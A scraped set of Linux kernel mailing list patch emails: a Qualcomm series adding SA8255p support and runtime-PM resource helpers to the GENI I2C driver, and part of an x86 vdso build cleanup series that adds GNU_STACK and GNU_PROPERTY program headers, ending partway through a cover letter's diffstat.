ret = devm_request_irq(dev, gi2c->irq, geni_i2c_irq, IRQF_NO_AUTOEN,
dev_name(dev), gi2c);
@@ -1110,23 +1116,6 @@ static int geni_i2c_probe(struct platform_device *pdev)
gi2c->adap.dev.of_node = dev->of_node;
strscpy(gi2c->adap.name, "Geni-I2C", sizeof(gi2c->adap.name));
- ret = geni_icc_get(&gi2c->se, desc ? desc->icc_ddr : "qup-memory");
- if (ret)
- return ret;
- /*
- * Set the bus quota for core and cpu to a reasonable value for
- * register access.
- * Set quota for DDR based on bus speed.
- */
- gi2c->se.icc_paths[GENI_TO_CORE].avg_bw = GENI_DEFAULT_BW;
- gi2c->se.icc_paths[CPU_TO_GENI].avg_bw = GENI_DEFAULT_BW;
- if (!desc || desc->icc_ddr)
- gi2c->se.icc_paths[GENI_TO_DDR].avg_bw = Bps_to_icc(gi2c->clk_freq_out);
-
- ret = geni_icc_set_bw(&gi2c->se);
- if (ret)
- return ret;
-
gi2c->suspended = 1;
pm_runtime_set_suspended(gi2c->se.dev);
pm_runtime_set_autosuspend_delay(gi2c->se.dev, I2C_AUTO_SUSPEND_DELAY);
--
2.34.1
|
{
"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:19 +0530",
"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
The Qualcomm automotive SA8255p SoC relies on firmware to configure
platform resources, including clocks, interconnects and TLMM.
The driver requests resources operations over SCMI using power
and performance protocols.
The SCMI power protocol enables or disables resources like clocks,
interconnect paths, and TLMM (GPIOs) using runtime PM framework APIs,
such as resume/suspend, to control power states(on/off).
The SCMI performance protocol manages I2C frequency, with each
frequency rate represented by a performance level. The driver uses
geni_se_set_perf_opp() API to request the desired frequency rate..
As part of geni_se_set_perf_opp(), the OPP for the requested frequency
is obtained using dev_pm_opp_find_freq_floor() and the performance
level is set using dev_pm_opp_set_opp().
Praveen Talari (13):
soc: qcom: geni-se: Refactor geni_icc_get() and make qup-memory ICC
path optional
soc: qcom: geni-se: Add geni_icc_set_bw_ab() function
soc: qcom: geni-se: Introduce helper API for resource initialization
soc: qcom: geni-se: Handle core clk in geni_se_clks_off() and
geni_se_clks_on()
soc: qcom: geni-se: Add resources activation/deactivation helpers
soc: qcom: geni-se: Introduce helper API for attaching power domains
soc: qcom: geni-se: Introduce helper APIs for performance control
dt-bindings: i2c: Describe SA8255p
i2c: qcom-geni: Isolate serial engine setup
i2c: qcom-geni: Move resource initialization to separate function
i2c: qcom-geni: Use resources helper APIs in runtime PM functions
i2c: qcom-geni: Store of_device_id data in driver private struct
i2c: qcom-geni: Enable I2C on SA8255p Qualcomm platforms
---
v3->v4
- Added a new patch(4/13) to handle core clk as part of
geni_se_clks_off/on().
---
.../bindings/i2c/qcom,sa8255p-geni-i2c.yaml | 64 ++++
drivers/i2c/busses/i2c-qcom-geni.c | 303 +++++++++---------
drivers/soc/qcom/qcom-geni-se.c | 265 +++++++++++++--
include/linux/soc/qcom/geni-se.h | 19 ++
4 files changed, 476 insertions(+), 175 deletions(-)
create mode 100644 Documentation/devicetree/bindings/i2c/qcom,sa8255p-geni-i2c.yaml
base-commit: 193579fe01389bc21aff0051d13f24e8ea95b47d
--
2.34.1
|
To manage GENI serial engine resources during runtime power management,
drivers currently need to call functions for ICC, clock, and
SE resource operations in both suspend and resume paths, resulting in
code duplication across drivers.
The new geni_se_resources_activate() and geni_se_resources_deactivate()
helper APIs addresses this issue by providing a streamlined method to
enable or disable all resources based, thereby eliminating redundancy
across drivers.
Acked-by: Viken Dadhaniya <viken.dadhaniya@oss.qualcomm.com>
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
v3->v4:
- Added Acked-by tag.
v1->v2:
Bjorn:
- Remove geni_se_resources_state() API.
- Used geni_se_resources_activate() and geni_se_resources_deactivate()
to enable/disable resources.
---
drivers/i2c/busses/i2c-qcom-geni.c | 28 +++++-----------------------
1 file changed, 5 insertions(+), 23 deletions(-)
diff --git a/drivers/i2c/busses/i2c-qcom-geni.c b/drivers/i2c/busses/i2c-qcom-geni.c
index 56eebefda75f..4ff84bb0fff5 100644
--- a/drivers/i2c/busses/i2c-qcom-geni.c
+++ b/drivers/i2c/busses/i2c-qcom-geni.c
@@ -1163,18 +1163,15 @@ static int __maybe_unused geni_i2c_runtime_suspend(struct device *dev)
struct geni_i2c_dev *gi2c = dev_get_drvdata(dev);
disable_irq(gi2c->irq);
- ret = geni_se_resources_off(&gi2c->se);
+
+ ret = geni_se_resources_deactivate(&gi2c->se);
if (ret) {
enable_irq(gi2c->irq);
return ret;
-
- } else {
- gi2c->suspended = 1;
}
- clk_disable_unprepare(gi2c->core_clk);
-
- return geni_icc_disable(&gi2c->se);
+ gi2c->suspended = 1;
+ return ret;
}
static int __maybe_unused geni_i2c_runtime_resume(struct device *dev)
@@ -1182,28 +1179,13 @@ static int __maybe_unused geni_i2c_runtime_resume(struct device *dev)
int ret;
struct geni_i2c_dev *gi2c = dev_get_drvdata(dev);
- ret = geni_icc_enable(&gi2c->se);
+ ret = geni_se_resources_activate(&gi2c->se);
if (ret)
return ret;
- ret = clk_prepare_enable(gi2c->core_clk);
- if (ret)
- goto out_icc_disable;
-
- ret = geni_se_resources_on(&gi2c->se);
- if (ret)
- goto out_clk_disable;
-
enable_irq(gi2c->irq);
gi2c->suspended = 0;
- return 0;
-
-out_clk_disable:
- clk_disable_unprepare(gi2c->core_clk);
-out_icc_disable:
- geni_icc_disable(&gi2c->se);
-
return ret;
}
--
2.34.1
|
{
"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:20 +0530",
"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
The Qualcomm automotive SA8255p SoC relies on firmware to configure
platform resources, including clocks, interconnects and TLMM.
The driver requests resources operations over SCMI using power
and performance protocols.
The SCMI power protocol enables or disables resources like clocks,
interconnect paths, and TLMM (GPIOs) using runtime PM framework APIs,
such as resume/suspend, to control power states(on/off).
The SCMI performance protocol manages I2C frequency, with each
frequency rate represented by a performance level. The driver uses
geni_se_set_perf_opp() API to request the desired frequency rate..
As part of geni_se_set_perf_opp(), the OPP for the requested frequency
is obtained using dev_pm_opp_find_freq_floor() and the performance
level is set using dev_pm_opp_set_opp().
Praveen Talari (13):
soc: qcom: geni-se: Refactor geni_icc_get() and make qup-memory ICC
path optional
soc: qcom: geni-se: Add geni_icc_set_bw_ab() function
soc: qcom: geni-se: Introduce helper API for resource initialization
soc: qcom: geni-se: Handle core clk in geni_se_clks_off() and
geni_se_clks_on()
soc: qcom: geni-se: Add resources activation/deactivation helpers
soc: qcom: geni-se: Introduce helper API for attaching power domains
soc: qcom: geni-se: Introduce helper APIs for performance control
dt-bindings: i2c: Describe SA8255p
i2c: qcom-geni: Isolate serial engine setup
i2c: qcom-geni: Move resource initialization to separate function
i2c: qcom-geni: Use resources helper APIs in runtime PM functions
i2c: qcom-geni: Store of_device_id data in driver private struct
i2c: qcom-geni: Enable I2C on SA8255p Qualcomm platforms
---
v3->v4
- Added a new patch(4/13) to handle core clk as part of
geni_se_clks_off/on().
---
.../bindings/i2c/qcom,sa8255p-geni-i2c.yaml | 64 ++++
drivers/i2c/busses/i2c-qcom-geni.c | 303 +++++++++---------
drivers/soc/qcom/qcom-geni-se.c | 265 +++++++++++++--
include/linux/soc/qcom/geni-se.h | 19 ++
4 files changed, 476 insertions(+), 175 deletions(-)
create mode 100644 Documentation/devicetree/bindings/i2c/qcom,sa8255p-geni-i2c.yaml
base-commit: 193579fe01389bc21aff0051d13f24e8ea95b47d
--
2.34.1
|
To avoid repeatedly fetching and checking platform data across various
functions, store the struct of_device_id data directly in the i2c
private structure. This change enhances code maintainability and reduces
redundancy.
Acked-by: Viken Dadhaniya <viken.dadhaniya@oss.qualcomm.com>
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
v3->v4
- Added Acked-by tag.
Konrad
- Removed icc_ddr from platfrom data struct
---
drivers/i2c/busses/i2c-qcom-geni.c | 30 ++++++++++++++----------------
1 file changed, 14 insertions(+), 16 deletions(-)
diff --git a/drivers/i2c/busses/i2c-qcom-geni.c b/drivers/i2c/busses/i2c-qcom-geni.c
index 4ff84bb0fff5..8fd62d659c2a 100644
--- a/drivers/i2c/busses/i2c-qcom-geni.c
+++ b/drivers/i2c/busses/i2c-qcom-geni.c
@@ -77,6 +77,12 @@ enum geni_i2c_err_code {
#define XFER_TIMEOUT HZ
#define RST_TIMEOUT HZ
+struct geni_i2c_desc {
+ bool has_core_clk;
+ bool no_dma_support;
+ unsigned int tx_fifo_depth;
+};
+
#define QCOM_I2C_MIN_NUM_OF_MSGS_MULTI_DESC 2
/**
@@ -122,13 +128,7 @@ struct geni_i2c_dev {
bool is_tx_multi_desc_xfer;
u32 num_msgs;
struct geni_i2c_gpi_multi_desc_xfer i2c_multi_desc_config;
-};
-
-struct geni_i2c_desc {
- bool has_core_clk;
- char *icc_ddr;
- bool no_dma_support;
- unsigned int tx_fifo_depth;
+ const struct geni_i2c_desc *dev_data;
};
struct geni_i2c_err_log {
@@ -979,7 +979,6 @@ static int setup_gpi_dma(struct geni_i2c_dev *gi2c)
static int geni_i2c_init(struct geni_i2c_dev *gi2c)
{
- const struct geni_i2c_desc *desc = NULL;
u32 proto, tx_depth;
bool fifo_disable;
int ret;
@@ -1002,8 +1001,7 @@ static int geni_i2c_init(struct geni_i2c_dev *gi2c)
goto err;
}
- desc = device_get_match_data(gi2c->se.dev);
- if (desc && desc->no_dma_support) {
+ if (gi2c->dev_data->no_dma_support) {
fifo_disable = false;
gi2c->no_dma = true;
} else {
@@ -1023,8 +1021,8 @@ static int geni_i2c_init(struct geni_i2c_dev *gi2c)
tx_depth = geni_se_get_tx_fifo_depth(&gi2c->se);
/* I2C Master Hub Serial Elements doesn't have the HW_PARAM_0 register */
- if (!tx_depth && desc)
- tx_depth = desc->tx_fifo_depth;
+ if (!tx_depth && gi2c->dev_data->has_core_clk)
+ tx_depth = gi2c->dev_data->tx_fifo_depth;
if (!tx_depth) {
ret = dev_err_probe(gi2c->se.dev, -EINVAL,
@@ -1067,7 +1065,6 @@ static int geni_i2c_probe(struct platform_device *pdev)
struct geni_i2c_dev *gi2c;
int ret;
struct device *dev = &pdev->dev;
- const struct geni_i2c_desc *desc = NULL;
gi2c = devm_kzalloc(dev, sizeof(*gi2c), GFP_KERNEL);
if (!gi2c)
@@ -1079,7 +1076,7 @@ static int geni_i2c_probe(struct platform_device *pdev)
if (IS_ERR(gi2c->se.base))
return PTR_ERR(gi2c->se.base);
- desc = device_get_match_data(&pdev->dev);
+ gi2c->dev_data = device_get_match_data(&pdev->dev);
ret = device_property_read_u32(dev, "clock-frequency",
&gi2c->clk_freq_out);
@@ -1218,15 +1215,16 @@ static const struct dev_pm_ops geni_i2c_pm_ops = {
NULL)
};
+static const struct geni_i2c_desc geni_i2c = {};
+
static const struct geni_i2c_desc i2c_master_hub = {
.has_core_clk = true,
- .icc_ddr = NULL,
.no_dma_support = true,
.tx_fifo_depth = 16,
};
static const struct of_device_id geni_i2c_dt_match[] = {
- { .compatible = "qcom,geni-i2c" },
+ { .compatible = "qcom,geni-i2c", .data = &geni_i2c },
{ .compatible = "qcom,geni-i2c-master-hub", .data = &i2c_master_hub },
{}
};
--
2.34.1
|
{
"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:21 +0530",
"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
The Qualcomm automotive SA8255p SoC relies on firmware to configure
platform resources, including clocks, interconnects and TLMM.
The driver requests resources operations over SCMI using power
and performance protocols.
The SCMI power protocol enables or disables resources like clocks,
interconnect paths, and TLMM (GPIOs) using runtime PM framework APIs,
such as resume/suspend, to control power states(on/off).
The SCMI performance protocol manages I2C frequency, with each
frequency rate represented by a performance level. The driver uses
geni_se_set_perf_opp() API to request the desired frequency rate..
As part of geni_se_set_perf_opp(), the OPP for the requested frequency
is obtained using dev_pm_opp_find_freq_floor() and the performance
level is set using dev_pm_opp_set_opp().
Praveen Talari (13):
soc: qcom: geni-se: Refactor geni_icc_get() and make qup-memory ICC
path optional
soc: qcom: geni-se: Add geni_icc_set_bw_ab() function
soc: qcom: geni-se: Introduce helper API for resource initialization
soc: qcom: geni-se: Handle core clk in geni_se_clks_off() and
geni_se_clks_on()
soc: qcom: geni-se: Add resources activation/deactivation helpers
soc: qcom: geni-se: Introduce helper API for attaching power domains
soc: qcom: geni-se: Introduce helper APIs for performance control
dt-bindings: i2c: Describe SA8255p
i2c: qcom-geni: Isolate serial engine setup
i2c: qcom-geni: Move resource initialization to separate function
i2c: qcom-geni: Use resources helper APIs in runtime PM functions
i2c: qcom-geni: Store of_device_id data in driver private struct
i2c: qcom-geni: Enable I2C on SA8255p Qualcomm platforms
---
v3->v4
- Added a new patch(4/13) to handle core clk as part of
geni_se_clks_off/on().
---
.../bindings/i2c/qcom,sa8255p-geni-i2c.yaml | 64 ++++
drivers/i2c/busses/i2c-qcom-geni.c | 303 +++++++++---------
drivers/soc/qcom/qcom-geni-se.c | 265 +++++++++++++--
include/linux/soc/qcom/geni-se.h | 19 ++
4 files changed, 476 insertions(+), 175 deletions(-)
create mode 100644 Documentation/devicetree/bindings/i2c/qcom,sa8255p-geni-i2c.yaml
base-commit: 193579fe01389bc21aff0051d13f24e8ea95b47d
--
2.34.1
|
The Qualcomm automotive SA8255p SoC relies on firmware to configure
platform resources, including clocks, interconnects and TLMM.
The driver requests resources operations over SCMI using power
and performance protocols.
The SCMI power protocol enables or disables resources like clocks,
interconnect paths, and TLMM (GPIOs) using runtime PM framework APIs,
such as resume/suspend, to control power on/off.
The SCMI performance protocol manages I2C frequency, with each
frequency rate represented by a performance level. The driver uses
geni_se_set_perf_opp() API to request the desired frequency rate..
As part of geni_se_set_perf_opp(), the OPP for the requested frequency
is obtained using dev_pm_opp_find_freq_floor() and the performance
level is set using dev_pm_opp_set_opp().
Acked-by: Viken Dadhaniya <viken.dadhaniya@oss.qualcomm.com>
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
v3->v4:
- Added Acked-by tag.
V1->v2:
- Initialized ret to "0" in resume/suspend callbacks.
Bjorn:
- Used seperate APIs for the resouces enable/disable.
---
drivers/i2c/busses/i2c-qcom-geni.c | 56 ++++++++++++++++++++++--------
1 file changed, 42 insertions(+), 14 deletions(-)
diff --git a/drivers/i2c/busses/i2c-qcom-geni.c b/drivers/i2c/busses/i2c-qcom-geni.c
index 8fd62d659c2a..2ad31e412b96 100644
--- a/drivers/i2c/busses/i2c-qcom-geni.c
+++ b/drivers/i2c/busses/i2c-qcom-geni.c
@@ -81,6 +81,10 @@ struct geni_i2c_desc {
bool has_core_clk;
bool no_dma_support;
unsigned int tx_fifo_depth;
+ int (*resources_init)(struct geni_se *se);
+ int (*set_rate)(struct geni_se *se, unsigned long freq);
+ int (*power_on)(struct geni_se *se);
+ int (*power_off)(struct geni_se *se);
};
#define QCOM_I2C_MIN_NUM_OF_MSGS_MULTI_DESC 2
@@ -203,8 +207,9 @@ static int geni_i2c_clk_map_idx(struct geni_i2c_dev *gi2c)
return -EINVAL;
}
-static void qcom_geni_i2c_conf(struct geni_i2c_dev *gi2c)
+static int qcom_geni_i2c_conf(struct geni_se *se, unsigned long freq)
{
+ struct geni_i2c_dev *gi2c = dev_get_drvdata(se->dev);
const struct geni_i2c_clk_fld *itr = gi2c->clk_fld;
u32 val;
@@ -217,6 +222,7 @@ static void qcom_geni_i2c_conf(struct geni_i2c_dev *gi2c)
val |= itr->t_low_cnt << LOW_COUNTER_SHFT;
val |= itr->t_cycle_cnt;
writel_relaxed(val, gi2c->se.base + SE_I2C_SCL_COUNTERS);
+ return 0;
}
static void geni_i2c_err_misc(struct geni_i2c_dev *gi2c)
@@ -908,7 +914,9 @@ static int geni_i2c_xfer(struct i2c_adapter *adap,
return ret;
}
- qcom_geni_i2c_conf(gi2c);
+ ret = gi2c->dev_data->set_rate(&gi2c->se, gi2c->clk_freq_out);
+ if (ret)
+ return ret;
if (gi2c->gpi_mode)
ret = geni_i2c_gpi_xfer(gi2c, msgs, num);
@@ -1043,8 +1051,9 @@ static int geni_i2c_init(struct geni_i2c_dev *gi2c)
return ret;
}
-static int geni_i2c_resources_init(struct geni_i2c_dev *gi2c)
+static int geni_i2c_resources_init(struct geni_se *se)
{
+ struct geni_i2c_dev *gi2c = dev_get_drvdata(se->dev);
int ret;
ret = geni_se_resources_init(&gi2c->se);
@@ -1097,7 +1106,7 @@ static int geni_i2c_probe(struct platform_device *pdev)
spin_lock_init(&gi2c->lock);
platform_set_drvdata(pdev, gi2c);
- ret = geni_i2c_resources_init(gi2c);
+ ret = gi2c->dev_data->resources_init(&gi2c->se);
if (ret)
return ret;
@@ -1156,15 +1165,17 @@ static void geni_i2c_shutdown(struct platform_device *pdev)
static int __maybe_unused geni_i2c_runtime_suspend(struct device *dev)
{
- int ret;
+ int ret = 0;
struct geni_i2c_dev *gi2c = dev_get_drvdata(dev);
disable_irq(gi2c->irq);
- ret = geni_se_resources_deactivate(&gi2c->se);
- if (ret) {
- enable_irq(gi2c->irq);
- return ret;
+ if (gi2c->dev_data->power_off) {
+ ret = gi2c->dev_data->power_off(&gi2c->se);
+ if (ret) {
+ enable_irq(gi2c->irq);
+ return ret;
+ }
}
gi2c->suspended = 1;
@@ -1173,12 +1184,14 @@ static int __maybe_unused geni_i2c_runtime_suspend(struct device *dev)
static int __maybe_unused geni_i2c_runtime_resume(struct device *dev)
{
- int ret;
+ int ret = 0;
struct geni_i2c_dev *gi2c = dev_get_drvdata(dev);
- ret = geni_se_resources_activate(&gi2c->se);
- if (ret)
- return ret;
+ if (gi2c->dev_data->power_on) {
+ ret = gi2c->dev_data->power_on(&gi2c->se);
+ if (ret)
+ return ret;
+ }
enable_irq(gi2c->irq);
gi2c->suspended = 0;
@@ -1215,17 +1228,32 @@ static const struct dev_pm_ops geni_i2c_pm_ops = {
NULL)
};
-static const struct geni_i2c_desc geni_i2c = {};
+static const struct geni_i2c_desc geni_i2c = {
+ .resources_init = geni_i2c_resources_init,
+ .set_rate = qcom_geni_i2c_conf,
+ .power_on = geni_se_resources_activate,
+ .power_off = geni_se_resources_deactivate,
+};
static const struct geni_i2c_desc i2c_master_hub = {
.has_core_clk = true,
.no_dma_support = true,
.tx_fifo_depth = 16,
+ .resources_init = geni_i2c_resources_init,
+ .set_rate = qcom_geni_i2c_conf,
+ .power_on = geni_se_resources_activate,
+ .power_off = geni_se_resources_deactivate,
+};
+
+static const struct geni_i2c_desc sa8255p_geni_i2c = {
+ .resources_init = geni_se_domain_attach,
+ .set_rate = geni_se_set_perf_opp,
};
static const struct of_device_id geni_i2c_dt_match[] = {
{ .compatible = "qcom,geni-i2c", .data = &geni_i2c },
{ .compatible = "qcom,geni-i2c-master-hub", .data = &i2c_master_hub },
+ { .compatible = "qcom,sa8255p-geni-i2c", .data = &sa8255p_geni_i2c },
{}
};
MODULE_DEVICE_TABLE(of, geni_i2c_dt_match);
--
2.34.1
|
{
"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:22 +0530",
"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
Currently the vdso doesn't include .note.gnu.property or a GNU noexec
stack annotation (the -z noexecstack in the linker script is
ineffective because we specify PHDRs explicitly.)
The motivation is that the dynamic linker currently do not check
these.
However, this is a weak excuse: the vdso*.so are also supposed to be
usable at link libraries, and there is no reason why the dynamic
linker might not want or need to check these in the future, so add
them back in -- it is trivial enough.
Use symbolic constants for the PHDR permission flags.
[ v4: drop unrelated formatting changes ]
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/vdso/common/vdso-layout.lds.S | 38 ++++++++++++--------
1 file changed, 23 insertions(+), 15 deletions(-)
diff --git a/arch/x86/entry/vdso/common/vdso-layout.lds.S b/arch/x86/entry/vdso/common/vdso-layout.lds.S
index ec1ac191a057..a1e30be3e83d 100644
--- a/arch/x86/entry/vdso/common/vdso-layout.lds.S
+++ b/arch/x86/entry/vdso/common/vdso-layout.lds.S
@@ -47,18 +47,18 @@ SECTIONS
*(.gnu.linkonce.b.*)
} :text
- /*
- * Discard .note.gnu.property sections which are unused and have
- * different alignment requirement from vDSO note sections.
- */
- /DISCARD/ : {
+ .note.gnu.property : {
*(.note.gnu.property)
- }
- .note : { *(.note.*) } :text :note
-
- .eh_frame_hdr : { *(.eh_frame_hdr) } :text :eh_frame_hdr
- .eh_frame : { KEEP (*(.eh_frame)) } :text
+ } :text :note :gnu_property
+ .note : {
+ *(.note*)
+ } :text :note
+ .eh_frame_hdr : { *(.eh_frame_hdr) } :text :eh_frame_hdr
+ .eh_frame : {
+ KEEP (*(.eh_frame))
+ *(.eh_frame.*)
+ } :text
/*
* Text is well-separated from actual data: there's plenty of
@@ -87,15 +87,23 @@ SECTIONS
* Very old versions of ld do not recognize this name token; use the constant.
*/
#define PT_GNU_EH_FRAME 0x6474e550
+#define PT_GNU_STACK 0x6474e551
+#define PT_GNU_PROPERTY 0x6474e553
/*
* We must supply the ELF program headers explicitly to get just one
* PT_LOAD segment, and set the flags explicitly to make segments read-only.
- */
+*/
+#define PF_R FLAGS(4)
+#define PF_RW FLAGS(6)
+#define PF_RX FLAGS(5)
+
PHDRS
{
- text PT_LOAD FLAGS(5) FILEHDR PHDRS; /* PF_R|PF_X */
- dynamic PT_DYNAMIC FLAGS(4); /* PF_R */
- note PT_NOTE FLAGS(4); /* PF_R */
- eh_frame_hdr PT_GNU_EH_FRAME;
+ text PT_LOAD PF_RX FILEHDR PHDRS;
+ dynamic PT_DYNAMIC PF_R;
+ note PT_NOTE PF_R;
+ eh_frame_hdr PT_GNU_EH_FRAME PF_R;
+ gnu_stack PT_GNU_STACK PF_RW;
+ gnu_property PT_GNU_PROPERTY PF_R;
}
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 16 Dec 2025 13:26:01 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
